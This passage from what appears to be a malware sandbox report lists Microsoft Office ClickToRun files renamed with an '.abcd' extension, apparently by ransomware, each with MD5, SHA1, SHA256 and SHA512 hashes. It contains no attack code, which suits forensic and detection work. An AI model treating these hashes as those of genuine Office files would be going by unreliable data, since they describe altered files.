| SHA1 | 690add0a197f965281f18ba9a8f231bb9ba83490 |
| SHA256 | 6ae1b12cae7481a6d735622cbc04e4a3b54d15bcbac20bc2815e2292661002cf |
| SHA512 | b49915aad1d8eb33027e175ed2a1e0ff689e69c76af3ec8b487902592268aea7a80722943e2cb4ad0d7de86cf79f717785a48d51589d3ec2e06219d141da743c |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.wordmui.msi.16.en-us.xml.abcd
| MD5 | fd5f12e3f1c09a678240dd4f50a00a8a |
| SHA1 | 3f88d8736e723a91e2487c6be4846fe0fae01e39 |
| SHA256 | 65e7a6b2773fad00c8a356ceefd945f2b8b95276522d52bb047d09717e1dfcd2 |
| SHA512 | 918f5f8529362aa7247b0a6f2869ace3bf98b8bd6d23dd32997df676cd5139584a623722f14d9cfbc641e970a3847fba35a5bab9fe974d2ede8d5fc7ca335f93 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.abcd
| MD5 | 4bf2a810ab0148e025c1eb1886712afd |
| SHA1 | 3324bd4b09d9d061708e8066eddec3a44d0b8065 |
| SHA256 | ee79a68367f45f447c320fe96babc50d8091ce46e71293b27c1b4a26f6ba733b |
| SHA512 | e124c455ba4d7cf2a10abfddcdfb7359e0ae1fc25b1281db21c38e0760fc04af74c16199466dd1b55f4d6c6380d21f59d91fdee8c7726cd339fcc64fc72f3b25 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.abcd
| MD5 | afe8a7f6b3e9dad53b67c8f15fa6e5c9 |
| SHA1 | 32e14104fca5a16f188d67cedf762f95852119ef |
| SHA256 | c8cca10c470e2b83a6b8771f5e75a1abd87debb091c710367bd4f39ad9a68c8d |
| SHA512 | dbd18c89f0278f730b7490b45d12220abeb06b37626439f6f0ec383e4363944b1c96d78ec60a071ff3bae69e9018fea9540817422ee1e08b8af7f1c931acb723 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.proofing.msi.16.en-us.xml.abcd
| MD5 | 4b059f3bd0e13c9e2ca365f3b71622f7 |
| SHA1 | 98fdc61612e8fce9908404beae6d0752a6cac03f |
| SHA256 | 5b7a3fbf79694a2e3cf03fdb3a6c2140086b3994ac57b100b3467d7db518eddc |
| SHA512 | 6644c0b1fc270f57ddd1a408bcab9d33e0c4147f191af046fe7134f38e7e4495e6b80c237841ac83631aa985d5cc6d762a3d3554e1e62b9125b88d3e52994633 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.abcd
| MD5 | e0c4a155c19ee3e1d2b03305d7f17215 |
| SHA1 | 3a809d0cfa73a3e8aed6a64e3c33a73c67bcded2 |
| SHA256 | ff79d9841fc2290195ceb6e7a3fc96ef74704061530610acd2a2b027240e10bd |
| SHA512 | 688a76b6c2ea9ead991ed534e1c86a41cfbf8477764179c3b73affd483d3a38cd7fb5a7c0a8673fd663a46c69605ecf3cfd7b28aa24d53f072e8755972f80294 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.es-es.xml.abcd
| MD5 | f177bcc12dac3cdd02d0e6878ac6710f |
| SHA1 | d14de0ff53666962bcabf07a66d22c9394108299 |
| SHA256 | 8d7a0988bee2108a90b2546e6d314231ce37598c52786694e11a310918141576 |
| SHA512 | 1e99361ce4c566df69e1b53497b5c9bda0bccff25d643317dc051a55bb42fa6aeff516a5e9a5f3584287159b5f7150374895800104027b26967f8265f40cd443 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.en-us.xml.abcd
| MD5 | 7b8cd501316968a74d98b14437154ea8 |
| SHA1 | 441c4a491daf174688c092864c018c8312e4a82f |
| SHA256 | 1bf5bb0d2a684135ce2fd5c9d90a660d3a3ab0b4fe9b3daa8227cea561010b3b |
| SHA512 | 982e14b68dbc3e3f7c1ff2a6715dd7251db2340bf4cc44089276f9c4e8b4006533fb597560d263e13c3bf6203875fc402d319748c49c4bb573b5a13c592debee |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml.abcd
| MD5 | 93e58230bc56725699dcee3679e244cc |
| SHA1 | 57cfbe1f38a95e52f83c5a40acb809582c78c601 |
| SHA256 | 784627bef48cbbd078c54e74a603ebe33089f60b8d94154ae70d3df829b5ba9f |
| SHA512 | 1f3d417e7f72a125e4489034c4642fb362af6e1e094a6d3a38e13c765cdf515dc61267b4b2a2f647470f97c17d4ba3c154afd81734f88deced8cce8537294de9 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.powerpointmui.msi.16.en-us.xml.abcd
| MD5 | 31424dc427a7108bccbb067156e6fd63 |
| SHA1 | 68eb31bba4935d880fc1989109d57faa770eacc1 |
| SHA256 | ce6091b3a48b79f3348a2495f82b8d528897fcb9c7652e322f81fe467d4c0866 |
| SHA512 | 4b336de9eb9b13fb6631ba9b89357b77cb7aa6e470a292747eea7eed7d2cb89950c9669caf461bbc24cf6eb463d4e8879938df502e6450cbce7cda71a8c3d768 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.abcd
| MD5 | 31c301a61529ac0bb7a72d16e914ab38 |
| SHA1 | fe50a449589f454b881aaff49caadf069d154ace |
| SHA256 | 8b68f87a25700f2a7b50082b91055eca493e10402686d0522c5a6e6aee9fb82b |
| SHA512 | 87ac4a4bfeb7c360273f1a05ab9c7bea656a713474924e6137adf79e3c802fa8e9e7aa4220a843f2d7993636939633a68174aef6bf8074c7882074d0d07f7d50 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.abcd
| MD5 | 5b0f0a5497cb872eded34a51e7338dcc |
| SHA1 | cd48a729dccdab2e1b92661134c1e3127edf4629 |
| SHA256 | d2de7bc358d666e3c932adbc31df8d5ce82ed9ac6996e34359622bdd930ce7a8 |
| SHA512 | 43867918d9aeab7b5b7a5a6f5169f5bc863d0273653520fc538beff4355fb76657cb3837ff74a2db36c158cf78a866bc5540b03f1b269c3f61d55d534491db1a |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.osmuxmui.msi.16.en-us.xml.abcd
| MD5 | 1a336541b8086151cc0657afb3317b09 |
| SHA1 | deaa7e468275a5a600ddc42fdfe9b50aebd90cde |
| SHA256 | 8e64bcabde8c6318cb3263ee38eef7703593ebd5610a53d8502dfaf19ca88be4 |
| SHA512 | 0e7826086db76311c77786938c1c108f908ad9082a2ea222ec362c93811784e044cd4d7960607367f157b392c46bc7a12fd5e9897c885bb2a3bc8387a1149b02 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.abcd
| MD5 | 6350f856a35e7e07175899906044fe0e |
| SHA1 | 8168870652547a1cbe52360671c042564a662a79 |
| SHA256 | 3918b15708e32d84f49a683874cab9f08bb9a3d6a0e4416e8484e87a7b92b644 |
| SHA512 | d576dbd091882e297f134b7f48c281993e255a4b886c7ee0062141076a908d14bda94787cb56cbec1a3f742edba430849db64b8dc39e87b139de4fbd5e82284a |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.osmmui.msi.16.en-us.xml.abcd
| MD5 | 6f81f581ddd367b40c45a10df7ab5796 |
| SHA1 | 0714b0b805a36b1a01b97850adc7f4fec1639f03 |
| SHA256 | 3b14b464bd3100c1fcb990064e8d3ece53054a2d26f41452ec6da36f183c9331 |
| SHA512 | 92deae4e7b842f578357f4530268b06deb0b4c33c245ac9dc8c2c8e78d865c0e435d3fec979a9d94f6ca6fbcb283971607145c1d2f5c1ce7ed54422bd48dee92 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.abcd
| MD5 | c3b14fbc04a7f6400e3a52447cc40715 |
| SHA1 | 7a9c1565be1c18b4dd3d9004ae83e2aa3dc4c613 |
| SHA256 | 5f4f34693576af148a6a0cf74df6ee72e95e52905113668f93c0094227edab6b |
| SHA512 | b2b5e23e1e8f9ab7eacb4a5fb41b07d6d17ee1ce2cd744f7e313d0e6f24eb2fd33b3754b9cff5b86550dee0a9e5467e9af84d7ae78115edd420383db8ec5b289 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.onenotemui.msi.16.en-us.xml.abcd
| MD5 | 0e99bc07616c813fa0c35a25d8661b0b |
| SHA1 | 6ab260804eb716a761b0533a5c16e9689265279d |
| SHA256 | 09307816777e99a49a107ee04f74e444aadfe1825e0f2d8bd142c34a5bd28b8c |
| SHA512 | fd505585f999747eea74609e097a1b1d45b5bae2a6f90604953e8b22c064134dfd4f71ae924073e07b023190be3f7a47ecb99db25c9e8c9c5a255394751e355a |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.abcd
| MD5 | 5cd1cd9cb5db292790c39cee6828e7f2 |
| SHA1 | 0e0032f50ade8bc7ff14f3adf53223c3be53c438 |
| SHA256 | 7935c87320efb02607efc3a67447a4b009d95b051451c4515b7b6f180df58a69 |
| SHA512 | 8392aa414df3c4f5f8db0f730a304c5839284c2e331b86240354d9a1e804e64ab76a13ba27b5d67254e65b7268033d96a29d8ac634443a89c13cac6765bd1cfe |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office32mui.msi.16.en-us.xml.abcd
| MD5 | 367753e7071bcf757abce861c1fa9837 |
| SHA1 | 149be7d8a73732f618f8f3a6b9b5a277e68a4879 |
| SHA256 | ed4bedb6b094d53024a891c01db8750382a6d2f90ae4b8463967cb0a0a33c35f |
| SHA512 | dd35f28d9c10619dc25a9943b872396eb4a2f3d14e571c55f69d665410631b37fcaaf298cba1ad4c55fdd0360d862bc06524e2b99c9e61e7445c2b9add553e01 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.abcd
| MD5 | 4a90a36488a55692d51eccadb4003344 |
| SHA1 | 33f05928a17e040b4819ea6350a19cbd3bce5469 |
| SHA256 | 696b2e82e83c402c1d4934b7e2e47cc4b76bd3dd603b4c94fc255736d1288974 |
| SHA512 | e0f3b430e3c41b8b5875289e82a37720f9ba2d8b89cc3f2fe9522a4c947a47015b92fb02c66407511f654d54c0e846cac6ed1f2b24c7ae4e2dd101e9a4964387 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.dcfmui.msi.16.en-us.xml.abcd
| MD5 | d3bc04c76c86feb9f81507435da069f7 |
| SHA1 | 0fa90ca144c4ca318d083b00b3da295c326d602f |
| SHA256 | 0676e92271f618a81f81c19b9dee222cf9789e6cf162128c8773517e7cade166 |
| SHA512 | 3d4dad0403ad3849c7b50b842f0ef0fb42aa40c785600354b25bb63a1a7bd69100284a78162290822ae3c37590e68bfcb2785b7fbfa9651fdb7ae56cb36348cd |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man.abcd
| MD5 | 9bfaf88116d5cf53ce26385ab33e8b62 |
| SHA1 | 834f4bbd571f9785cb7d03770d6d532998b8c4fc |
| SHA256 | 656efdbcedfe42ef0f1c6e643c91c0b8fad20b416bf2ad66476b7abcf5162343 |
| SHA512 | a3cfb7d599a427b957a07eff0fc565768334134cb099fd42192467509b15778a9bda1213b941f97c7d957d368bc3370ab6e4a3e9408016effe13def0f2dbbf91 |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.man.dat.abcd
| MD5 | 74ee780e7fc92e061f2cce44e902760a |
| SHA1 | 36d56ff1e13827e484fbff00e104d718f7ef2511 |
| SHA256 | cbe3f7035307939fcc05886799236c14f1d4e4bf80a59403b2244e0f43edae2d |
| SHA512 | ed7b81e9788d6490e7fd9289a442a64a4fd9fb2d3edae9215dfd0817777d48c14257433f2a75ce16636e900ae373de2a6fd1b72478131f28b4cdf52c8faf0b2b |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.hash.abcd
| MD5 | 9124e11719b5e61adcce56450fce4a81 |
| SHA1 | 1fa6e2cded41ae0fb63edab5d798cd1c795e48b6 |
| SHA256 | e091f174eee693adb3c04da25cd086ff8c44dfe294978e0ff2ae999048bd986a |
| SHA512 | ea8b3126328e6ba4d1defe59c925fdbc9f098bd48aff17c316e4415dcc2d75a11677b60a8ddd87cc42039aa4ee77577e5caaf615b3bee83539e711c14e94c0e4 |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.db.abcd
| MD5 | 597358e330202a8aea3004697e8d404c |
| SHA1 | c19fee1caa9954e79bf56108133dbb68c2b7687e |
| SHA256 | dafdac663f797c3408e662255a4ba11610755c70f756ef4eb7c1b4512d125a15 |
| SHA512 | 27f680250e229126bca216c6c1eede217fd314ba4a8682cd934711544cff3cd96b009a612bad0c283d496ecdf073f0180e24937485de7a093044759f1bbc2081 |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\s640.hash.abcd
| MD5 | 1144a3037d4e181eff5cc98c9535dc20 |
| SHA1 | 016ab8fa47b6c13465864849cf9107c55fb8aab5 |
| SHA256 | 7ba9f6cc4abadaef7e82e41cfa7d59f03e3138cad913129b5e306c3b4bd6ed58 |
| SHA512 | b2a3b7176fe4cb5763a681a4f6d507530d466d484fa2f001efa91815660ef0bdc4386b72d25bcacc46a6ec3ffa768ad479fa3ab33fe4041d08cd95ad12006a83 |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\MasterDescriptor.x-none.xml.abcd
| MD5 | dd26f7dcc88ee8a40882e16b2fd99fff |
| SHA1 | 9a79332a0342382a27da6c2503f5478eab5aee98 |
| SHA256 | 0d43a7d89166e3f73cfb80d22ce19957669d5a2e28a333b7a8c0498b33d42edc |
| SHA512 | bfeac8b282b3f0a8b0cac6efd7a6d4cf4802b985149530eef795ca739c379bb7b4e5408428848c4a04b9aadb36069b91b5162f26506d44abe69b63ca4bcc5a24 |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\mergedVirtualRegistry.dat.abcd
| MD5 | 7dcbb11cb865f9d386cf5d8b2b3fc9fb |
| SHA1 | 5db53abc289d824eab852c0c0fcfaed84aae4f50 |
| SHA256 | e17f99d2e631ccf3f90735249568ba4b092ac3103667919c71c272a021d8305a |
| SHA512 | 05948515bf74ad2d42c226ced297ede074f99e0b0041f6e48613e580fa020adc0f851bceb5a0270c37782a8a893241d6b1f7ba3322e01e385a30ccc4724fe53b |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.man.dat.abcd
| MD5 | bf943cd87e958f13c86defbcd2863d22 |
| SHA1 | 1c782283d66c27922372cc6767739236526d036d |
| SHA256 | fa2790d050b04e70f13068b6eb40dcf2d05a700d92725e3bf5b5a15f28b00710 |
| SHA512 | 6c6eaf5234838ef4c09885546a60d62176eb8ae99214b79a36a541a82f47c099d1446a872540d33d018b0340122e4ba0e7c95691d25f14155750546fe11fcbe3 |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.hash.abcd
| MD5 | 782310d741f4488e0355f039db6fc00f |
| SHA1 | 4413e5333db1f0ef1c84888097692787d4103346 |
| SHA256 | a69088af5f2e94ae3bc866f5cbbdacc2c5688d5c9feffe0fe6ab764b9043b5e3 |
| SHA512 | bda6a4dfd2c7ef517e38c832ac516c5b937b749b23c893246d3c4567a73604aa3a88f24002458f09906e29091caaac5a84ae995e8ab28df0b755da747516adaf |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.dat.cat.abcd
| MD5 | d992eb8b120d4f3b51554b1c27422fec |
| SHA1 | 101de2aaba28e4ae1b9aa25f718d87069aa20918 |
| SHA256 | 2c4679cc0198a02198a428b7a534b9d72d5d065af049c24a671eb493fdd05cb8 |
| SHA512 | 3a28524470aff945de0a38d8716c98d4307584cc60862086c0304ff7605de99cd3e2e18f0dde009274ecaf5ad1c6a474087222e8da90c099766f64393d86ad3f |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\s641033.hash.abcd
| MD5 | debafec90ce6ac130666bb5047c76313 |
| SHA1 | f8107e63d280d783cb9ff7fdcf567bba5c5563ca |
| SHA256 | 8a08479e82d7f6295582f9fe353ce9754007d6d907f0e796fa42873ffcfcb793 |
| SHA512 | 27c5268aa523b4ba61810b9382035e6535fc4658dcdbafef4a97d8727a1c483801dcde0881e12551a13398a41d08614b5d0b43c0e5dd28100e3576d0a9b684c6 |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\MasterDescriptor.en-us.xml.abcd
| MD5 | 2bcd48124549aa34632b389fcf392c11 |
| SHA1 | 677acdce8d5c0369a7bf94b47d8ad9e82a054968 |
| SHA256 | 18a907adb344faedfc197a4ff6d72b33dafd6db77c27be93a8999e3bc07a1b7e |
| SHA512 | 0ef87cc6d2c670e4b0340c6cb2d31ee1f6a11b99906c73b332837655e41b46a005323d9f30478ca9422be2f7bbdece4308aadf945a134ec76dbed624b81d8749 |
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserManifest.xml.abcd
| MD5 | 1cd6eded9a4240ca6e4f03a2534e85fd |
| SHA1 | e0375ca2b53aa33615d650071974825b00922c5e |
| SHA256 | 9c837f781aae7c7d14a4ba49878019c7e33bdce082cc31ac85199e8c11d112a3 |
| SHA512 | 3347c085d4f2276240dbe507b2adc2b236d959d953b3b8b6e13ec5dd1ac9b9ab4b695ea3dd601fb937a72cd2023540db191276975296f5d8ee855a641232cc4d |
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserDeploymentConfiguration.xml.abcd
| MD5 | d3a8c77a330bd7016edad78fda91da6e |
| SHA1 | dc338d2a1c5c7cb871d2e1d9dfe537a8f29be7f4 |
| SHA256 | e78aecac62a6a72e1cd3c27cf7dd8d86c60cf93ead987bb03b430ba7a31b06f4 |
| SHA512 | 9451cef9164adb8c1e785d19be1217e5640b2b884911f9d20d3a17294c5336cd1dd7a1948faaa9e6d800831decdbbb8ae81d6ca7b52206bd3b958c490cac9176 |
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\DeploymentConfiguration.xml.abcd
| MD5 | ad998501207bb25b5d03db21489754b6 |
| SHA1 | 3314afccdb176fa2cce2a7d89c89cf0166819004 |
| SHA256 | a6fb792103d99b41a8db065b629b95e0dad1b528c58d5aee45422b3f6b3189ca |
| SHA512 | 2a00b123dd09dd9ce8dee3dc8d7d5cb0169a24643c4d6dc477bdd066b3d2f1be5d8ca43e8725424278403c5d9439da44cc3bd7b5604e98e331d0fa5c166b003e |
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.0.xml.abcd
| MD5 | 1a2fca5dc7bee8b223fea16afe40e3b1 |
| SHA1 | 4ba5adf745e8db2933d8aa3d5cd7c8bbe0b261f3 |
| SHA256 | d24e4a088fb998a3990c1da2d82bfcbd6b4014a9f41eb9a8cbbeeab356e53af0 |
| SHA512 | dd974419089bb42e61a824566c2d3134819325cf1872740cce3e128b5bce2ce69d0998c3471b2281ce70953f0e4d380abe95d70ba7b532657bb5cbed4d0f7ec5 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemui.msi.16.en-us.xml.abcd
| MD5 | 065b7c2982ed38888057ebc043303c77 |
| SHA1 | 399df11fdc0e1009d65bcbb96222314e4cd49859 |
| SHA256 | 557e0824fb5ea81351d6723229f18329a17b2899e5de66c0e11c51300e37db0c |
| SHA512 | 5f33c9d3a2442fa7c81d0bcbe4b2de2d94cf58b45fbe75cfaf0187c8edf10a0d4d28d611e11db88fef754dc58a4d27ed4a401f66dff5437c7f61275a4c21a1d7 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.abcd
| MD5 | c89a0eb5813708644e55d26b98185e69 |
| SHA1 | de78c1b9c72ac2a6535f1a798d6de06eb39f7387 |
| SHA256 | 2930b98bb93afb270b1c592ac6848680efebbe0b788f06156a75ace0177389b4 |
| SHA512 | bd440e949d7ca5028e3615aff82b6a5deedac0e877edf58c6a6cef21a858e52ca8190a8e0642ab7b9bc0012afa172b57a73159456d2b5995207e998696d7acf8 |
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.2.xml.abcd
| MD5 | 080b952f64c0a1427e3cc50d8fef1b04 |
| SHA1 | 1fd5d803e324647992153877b5c445d5e2ed2f85 |
| SHA256 | b4687e80f24e29357d83edb597cffaeebb533c7c94d4a1f0599c34bfaf8c4541 |
| SHA512 | f11e6cc464873df042f16724d3d4a1b99a7a890b569b5ef8693233f1f0d647fe8bd190c66b0ebfae4575394bfe12c3d718659058e914808997688c66205d055e |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.dat.cat.abcd
| MD5 | 2e6cab780dcb219a9c43086708ed798a |
| SHA1 | f4450179b89565f41a40537b63d5d385d0bfb233 |
| SHA256 | 89351fbdfdb9666eb83403ca4bbf535addf312aa9cf2084bae0ecf239e935105 |
| SHA512 | 7abf3ec6ba0c5590f37b2fd24e226c59002c617641e3deab4aa9b7654ccd4506ed3e18c38ecd7c69c1e3c745d6501976f9e65dbe47400533c92a57caaeebdabc |
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.db.abcd
| MD5 | a7673c2d2b9284037c813f64cfc51971 |
| SHA1 | 725d2a25c05b550acc39ce9d93f99487c2e05a5b |
| SHA256 | abcafd55130134b20271a81a57ac99605b24ef5e95e7a2dbaee145d018788530 |
| SHA512 | 3af44e489e75fe9eb1d5bcab341c1c2b82bcc16f9d8d32ba8d25cdd5b4e28f4ee415b0bb3481ba82a8da9e8ae715cabffa5f2edff33baddccee1d34a89ace550 |